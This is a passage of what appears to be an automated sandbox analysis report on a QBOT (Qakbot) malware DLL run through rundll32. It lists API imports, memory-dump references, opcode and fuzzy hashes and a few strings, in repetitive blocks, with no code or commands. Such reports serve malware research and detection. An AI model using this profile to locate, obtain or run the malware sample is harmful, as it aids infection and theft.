                                                                                                                                                                                                                                                                            • linit_2pass_quantizer.042_QBOT.DLL ref: 6ADA0C70
                                                                                                                                                                                                                                                                            • linit_inverse_dct.042_QBOT.DLL ref: 6ADA0C8B
                                                                                                                                                                                                                                                                            • linit_huff_decoder.042_QBOT.DLL ref: 6ADA0CAD
                                                                                                                                                                                                                                                                            • linit_d_coef_controller.042_QBOT.DLL ref: 6ADA0CD3
                                                                                                                                                                                                                                                                            • linit_color_deconverter.042_QBOT.DLL ref: 6ADA0D88
                                                                                                                                                                                                                                                                            • linit_upsampler.042_QBOT.DLL ref: 6ADA0D90
                                                                                                                                                                                                                                                                            • linit_d_post_controller.042_QBOT.DLL ref: 6ADA0DA0
                                                                                                                                                                                                                                                                            • linit_phuff_decoder.042_QBOT.DLL ref: 6ADA0DAA
                                                                                                                                                                                                                                                                            • linit_merged_upsampler.042_QBOT.DLL ref: 6ADA0DB5
                                                                                                                                                                                                                                                                            • linit_d_main_controller.042_QBOT.DLL ref: 6ADA0DCD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ldiv_round_up.042_$linit_1pass_quantizer.042_linit_2pass_quantizer.042_linit_color_deconverter.042_linit_d_coef_controller.042_linit_d_main_controller.042_linit_d_post_controller.042_linit_huff_decoder.042_linit_inverse_dct.042_linit_merged_upsampler.042_linit_phuff_decoder.042_linit_upsampler.042_lpeg_calc_output_dimensions.042_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 847079953-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8f8d645404bace55164931a3bfce681cf05279c310a77323abab86c2d1772ee9
                                                                                                                                                                                                                                                                            • Instruction ID: c0387bdecfaaaa072bb99cd075e73faf0a0dabea441fd23d5f9541578158eca5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f8d645404bace55164931a3bfce681cf05279c310a77323abab86c2d1772ee9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACC1B175908381CEEB158F28C4983967BA1BF01348F4B46A9DE984F397DBB9D484C791
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(?,?,?,?,00000000,?,6AD813F7), ref: 6AD81078
                                                                                                                                                                                                                                                                            • InterlockedCompareExchange.KERNEL32 ref: 6AD81094
                                                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 6AD810B2
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(?,?,?,?,00000000,?,6AD813F7), ref: 6AD810F5
                                                                                                                                                                                                                                                                            • InterlockedCompareExchange.KERNEL32 ref: 6AD8110D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareExchangeInterlockedSleep$_amsg_exit
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4147465460-0
                                                                                                                                                                                                                                                                            • Opcode ID: bac6e01a1ad78b942d5311be2141cf2e20617ede113cd59077056fcba15d0403
                                                                                                                                                                                                                                                                            • Instruction ID: 3f6f46b6578e8aa65eee795ddd52488bf0bb15b77957d4d50d28a2e0bcf6b46e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bac6e01a1ad78b942d5311be2141cf2e20617ede113cd59077056fcba15d0403
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 265120F1548341CBEB00AF68D58571B7BF4BB41758F838A5DE89487344DB7698888BA3
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • linit_c_master_control.042_QBOT.DLL ref: 6AD8C253
                                                                                                                                                                                                                                                                            • linit_forward_dct.042_QBOT.DLL ref: 6AD8C268
                                                                                                                                                                                                                                                                            • linit_huff_encoder.042_QBOT.DLL ref: 6AD8C282
                                                                                                                                                                                                                                                                            • linit_c_coef_controller.042_QBOT.DLL ref: 6AD8C2A8
                                                                                                                                                                                                                                                                            • linit_c_main_controller.042_QBOT.DLL ref: 6AD8C2B8
                                                                                                                                                                                                                                                                            • linit_marker_writer.042_QBOT.DLL ref: 6AD8C2C0
                                                                                                                                                                                                                                                                            • linit_phuff_encoder.042_QBOT.DLL ref: 6AD8C2E0
                                                                                                                                                                                                                                                                            • linit_color_converter.042_QBOT.DLL ref: 6AD8C2F5
                                                                                                                                                                                                                                                                            • linit_downsampler.042_QBOT.DLL ref: 6AD8C2FD
                                                                                                                                                                                                                                                                            • linit_c_prep_controller.042_QBOT.DLL ref: 6AD8C30D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: linit_c_coef_controller.042_linit_c_main_controller.042_linit_c_master_control.042_linit_c_prep_controller.042_linit_color_converter.042_linit_downsampler.042_linit_forward_dct.042_linit_huff_encoder.042_linit_marker_writer.042_linit_phuff_encoder.042_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1234778944-0
                                                                                                                                                                                                                                                                            • Opcode ID: 067cbd41030120c24c9dc2e3ecb1a72afdd8091d4aeeba82ff68ce232f3d6047
                                                                                                                                                                                                                                                                            • Instruction ID: e18b3151966e1939f1b37eac17263b751a1124d1ccf2fe6d581c25418835d927
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 067cbd41030120c24c9dc2e3ecb1a72afdd8091d4aeeba82ff68ce232f3d6047
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C11A2F040C780DAD750AF7884C875EBAE0BF06708F47596DD8C94B287CB789484DBA2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lpeg_add_quant_table.042_QBOT.DLL ref: 6AD902FB
                                                                                                                                                                                                                                                                            • lpeg_add_quant_table.042_QBOT.DLL ref: 6AD90323
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lpeg_add_quant_table.042_
                                                                                                                                                                                                                                                                            • String ID: 2
                                                                                                                                                                                                                                                                            • API String ID: 2519534163-450215437
                                                                                                                                                                                                                                                                            • Opcode ID: e94ca69451cebde285347c56735baed99eb44625613ff43082a63bca312c40b4
                                                                                                                                                                                                                                                                            • Instruction ID: e6c5f4e15193e5d4d88a427fddf35b49f97a2a12a02e07099df601144bb54bd3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e94ca69451cebde285347c56735baed99eb44625613ff43082a63bca312c40b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09F15775A08240DFE754DF28D094B967FF2BF86304F4684A8D8888F396DB78D945CB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lpeg_suppress_tables.042_QBOT.DLL ref: 6AD94B10
                                                                                                                                                                                                                                                                            • linit_c_master_control.042_QBOT.DLL ref: 6AD94B38
                                                                                                                                                                                                                                                                            • linit_huff_encoder.042_QBOT.DLL ref: 6AD94B5A
                                                                                                                                                                                                                                                                            • lpeg_write_tables.042_QBOT.DLL ref: 6AD94BB9
                                                                                                                                                                                                                                                                            • linit_marker_writer.042_QBOT.DLL ref: 6AD94C15
                                                                                                                                                                                                                                                                            • linit_phuff_encoder.042_QBOT.DLL ref: 6AD94C46
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: linit_c_master_control.042_linit_huff_encoder.042_linit_marker_writer.042_linit_phuff_encoder.042_lpeg_suppress_tables.042_lpeg_write_tables.042_
                                                                                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                                                                                            • API String ID: 2208626402-2746444292
                                                                                                                                                                                                                                                                            • Opcode ID: 203de22d7259de9f947a99f002044e9b7749fa9c38b2387a9ba707c46adb9b6b
                                                                                                                                                                                                                                                                            • Instruction ID: f7542c68cc969b726b4af2d78036eb91490fb35bdc98df071e17cc679fca549a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 203de22d7259de9f947a99f002044e9b7749fa9c38b2387a9ba707c46adb9b6b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83418EB4505B00DFD754DF24C5C878ABBE0BF48308F02896ED99A8B316DB74E584CBA2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                                                                                            • API String ID: 0-3993045852
                                                                                                                                                                                                                                                                            • Opcode ID: 9aea1e327d18141519636dc1b8d95b704eb7b22057aa2022c2894bf34df2473c
                                                                                                                                                                                                                                                                            • Instruction ID: 1eab7fab485df9b0d148d5bed4839e1b7ed347ef04f2027a3b88c764c343b39f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aea1e327d18141519636dc1b8d95b704eb7b22057aa2022c2894bf34df2473c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DA1C3B0604301CFDB54DF29C084B5ABBE1BF49304F1684ADD8898F356DB75E989CBA2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lpeg_mem_init.042_QBOT.DLL(?,?,?,?,?,?,?,?,6AD81660), ref: 6ADAF3F3
                                                                                                                                                                                                                                                                            • lpeg_get_small.042_QBOT.DLL ref: 6ADAF407
                                                                                                                                                                                                                                                                            • getenv.MSVCRT ref: 6ADAF4AB
                                                                                                                                                                                                                                                                            • sscanf.MSVCRT ref: 6ADAF4D4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: getenvlpeg_get_small.042_lpeg_mem_init.042_sscanf
                                                                                                                                                                                                                                                                            • String ID: T$x
                                                                                                                                                                                                                                                                            • API String ID: 3084848803-1002588118
                                                                                                                                                                                                                                                                            • Opcode ID: db5ad559ac98bae7df72a89b57da7feb99cf654f11486630b3f8bb31fe28f1f8
                                                                                                                                                                                                                                                                            • Instruction ID: 5d0387d6458e81ada940056cb392f5bbf3adec300b29f5bae941133d5d4cb07e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db5ad559ac98bae7df72a89b57da7feb99cf654f11486630b3f8bb31fe28f1f8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D631EDB00087108FEB40DF15C19534ABBE4AF49304F52898DEA988F39AEB79D585CFD2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: getenv
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 498649692-0
                                                                                                                                                                                                                                                                            • Opcode ID: 51101371f779dc29345ce9728112d4cac38d16c5d9db5d12594e895d415b906f
                                                                                                                                                                                                                                                                            • Instruction ID: 3fa1cd730f1959ed6a166857b2401a12dad7c2ce6527365fe1cf0b070ae3f8cc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51101371f779dc29345ce9728112d4cac38d16c5d9db5d12594e895d415b906f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 312193F3644105D3EB103F21856E33525A9AB4236AFC708ADC4978B75AEF39C841D367
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Unknown pseudo relocation bit size %d., xrefs: 6ADC503E
                                                                                                                                                                                                                                                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 6ADC4F17, 6ADC4F43, 6ADC51D7
                                                                                                                                                                                                                                                                            • Unknown pseudo relocation protocol version %d., xrefs: 6ADC51EB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                                                                                                                                                                                                                                                                            • API String ID: 0-974437099
                                                                                                                                                                                                                                                                            • Opcode ID: 9ad28d4d323b674a2e2dcd1cd8893c3567945a917d25b34cad8fe9ba4ef76f9f
                                                                                                                                                                                                                                                                            • Instruction ID: 332497999dc6db8bd7d5c1b3476d49a9780cdf6b5e80ca64d9d5470ff6f69c52
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ad28d4d323b674a2e2dcd1cd8893c3567945a917d25b34cad8fe9ba4ef76f9f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5571DFB1944200DFDB10CF68D48865EB7F9BF46310F878159D96ADB396EF30A940CB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lpeg_set_defaults.042_QBOT.DLL ref: 6AD94CB3
                                                                                                                                                                                                                                                                            • lpeg_set_colorspace.042_QBOT.DLL ref: 6AD94CC6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lpeg_set_colorspace.042_lpeg_set_defaults.042_
                                                                                                                                                                                                                                                                            • String ID: T$T
                                                                                                                                                                                                                                                                            • API String ID: 1790994700-152709941
                                                                                                                                                                                                                                                                            • Opcode ID: 3b097d9bb3a82a5aac6b579832da24ad101eb866f4ef5c8b9f12fe72cd779cae
                                                                                                                                                                                                                                                                            • Instruction ID: 5669d77f0196abb09541f12b065b06d54c790ed7272d93d1eff1252bf0283afc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b097d9bb3a82a5aac6b579832da24ad101eb866f4ef5c8b9f12fe72cd779cae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 839107B8608350CFC744CF28C084A66BBF0BF99304F5649A9E9998B366D735E945CB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Address %p has no image-section, xrefs: 6ADC4F2B
                                                                                                                                                                                                                                                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 6ADC4F17, 6ADC4F43
                                                                                                                                                                                                                                                                            Memory Dump Source
